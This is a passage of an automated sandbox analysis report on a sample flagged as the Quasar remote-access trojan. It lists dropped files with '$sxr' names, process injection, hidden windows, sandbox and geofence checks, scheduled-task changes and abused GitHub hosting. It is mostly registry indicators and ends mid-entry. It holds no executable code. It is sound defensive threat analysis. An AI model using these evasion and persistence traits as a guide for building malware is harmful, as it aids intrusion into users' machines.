Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1050s -
max time network
1049s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01/01/2025, 23:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://youtube.com
Resource
win10v2004-20241007-en
General
-
Target
http://youtube.com
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/2396-811-0x0000023B62B90000-0x0000023B63306000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 6560 created 6424 6560 WerFault.exe 174 -
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 700 created 612 700 build.bat.exe 5 PID 2396 created 612 2396 $sxr-powershell.exe 5 PID 2396 created 612 2396 $sxr-powershell.exe 5 PID 700 created 612 700 build.bat.exe 5 PID 700 created 612 700 build.bat.exe 5 PID 4708 created 612 4708 build.bat.exe 5 PID 6052 created 612 6052 $sxr-powershell.exe 5 PID 6052 created 612 6052 $sxr-powershell.exe 5 PID 4708 created 612 4708 build.bat.exe 5 PID 4708 created 612 4708 build.bat.exe 5 PID 6516 created 6424 6516 svchost.exe 174 -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation build.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation build.bat.exe -
Executes dropped EXE 6 IoCs
pid Process 700 build.bat.exe 2396 $sxr-powershell.exe 3832 $sxr-powershell.exe 4708 build.bat.exe 6052 $sxr-powershell.exe 1596 $sxr-powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 4 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 3832 $sxr-powershell.exe 6052 $sxr-powershell.exe 1596 $sxr-powershell.exe 2396 $sxr-powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 134 camo.githubusercontent.com 135 raw.githubusercontent.com -
Drops file in System32 directory 26 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll build.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll build.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll build.bat.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File created C:\Windows\System32\vcruntime140_1d.dll build.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\Tasks\$sxr-lvHIFQdKtdAeoNrdloeg svchost.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File created C:\Windows\System32\ucrtbased.dll build.bat.exe File created C:\Windows\System32\vcruntime140d.dll build.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\ucrtbased.dll build.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\ucrtbased.dll build.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll build.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 700 set thread context of 2744 700 build.bat.exe 136 PID 2396 set thread context of 4648 2396 $sxr-powershell.exe 138 PID 2396 set thread context of 2408 2396 $sxr-powershell.exe 140 PID 700 set thread context of 5716 700 build.bat.exe 142 PID 700 set thread context of 5456 700 build.bat.exe 143 PID 4708 set thread context of 5416 4708 build.bat.exe 158 PID 6052 set thread context of 2716 6052 $sxr-powershell.exe 160 PID 6052 set thread context of 5356 6052 $sxr-powershell.exe 162 PID 4708 set thread context of 432 4708 build.bat.exe 168 PID 4708 set thread context of 5736 4708 build.bat.exe 173 -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\$sxr-powershell.exe build.bat.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File created C:\Windows\$sxr-powershell.exe build.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe build.bat.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-powershell.exe build.bat.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1924 cmd.exe 6056 PING.EXE 6424 cmd.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 5672 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-1 = "Microsoft Language Detection" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\acppage.dll,-6002 = "Windows Batch File" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-174 = "Microsoft PowerPoint Presentation" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration" SearchIndexer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000006521764da75cdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\setupapi.dll,-2000 = "Setup Information" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E46787A1-4629-4423-A693-BE1F003B2742} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000005d530655a75cdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9923 = "Windows Media playlist" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My SearchFilterHost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-9 = "Microsoft Bengali to Latin Transliteration" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip" SearchProtocolHost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-4 = "Microsoft Simplified Chinese to Traditional Chinese Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-103 = "Windows PowerShell Script" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\OpenWithList SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithList SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-102 = "Microsoft Excel Template" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-120 = "Microsoft Word 97 - 2003 Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000003135514da75cdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-103 = "Microsoft Excel Macro-Enabled Worksheet" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut" SearchProtocolHost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-111 = "Microsoft Excel Macro-Enabled Template" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\OpenWithList SearchProtocolHost.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\Mode = "8" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943} Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 17031f009d02d5dfa3238f020400000000008b0200003153505305d5cdd59c2e1b10939708002b2cf9aecb01000012000000004100750074006f004c006900730074000000420000001e000000700072006f00700034003200390034003900360037003200390035000000000081010000aea54e38e1ad8a4e8a9b7bea78fff1e9060000800000000001000000020000800100000001000000020000002000000000000000850014001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c000000000000000000000000000000000000005600310000000000215a6ebd100057696e646f777300400009000400efbe874f7748215a6ebd2e00000000060000000001000000000000000000000000000000d409ba00570069006e0064006f0077007300000016000000000000000000000000000000000000000000000001000000010000800100000004006900740065006d00000000000000000000000000000000000000000000000000000000000000000000000000000000001e1ade7f318ba54993b86be14cfa4943ffffffffffffffffffffffff00000000010000001900530065006100720063006800200052006500730075006c0074007300200069006e002000570069006e0064006f0077007300000000000000000000000000000000000000000000000000000000000000003900000024000000004100750074006f006c0069007300740043006100630068006500540069006d0065000000140000003d38c42d100000006b00000022000000004100750074006f006c00690073007400430061006300680065004b006500790000001f0000001b000000530065006100720063006800200052006500730075006c0074007300200069006e002000570069006e0064006f007700730030000000000000000000000000000000741a595e96dfd3488d671733bcee28ba671b730433d90a4590e64acd2e9408fe2a0000001300efbe0000002000000000000000000000000000000000000000000000000001000000c3022a0000001900efbe1e1ade7f318ba54993b86be14cfa49436f73bebdf5342948abe8b550e65146c4c3020000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0000000001000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "5" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "7" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "9" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local 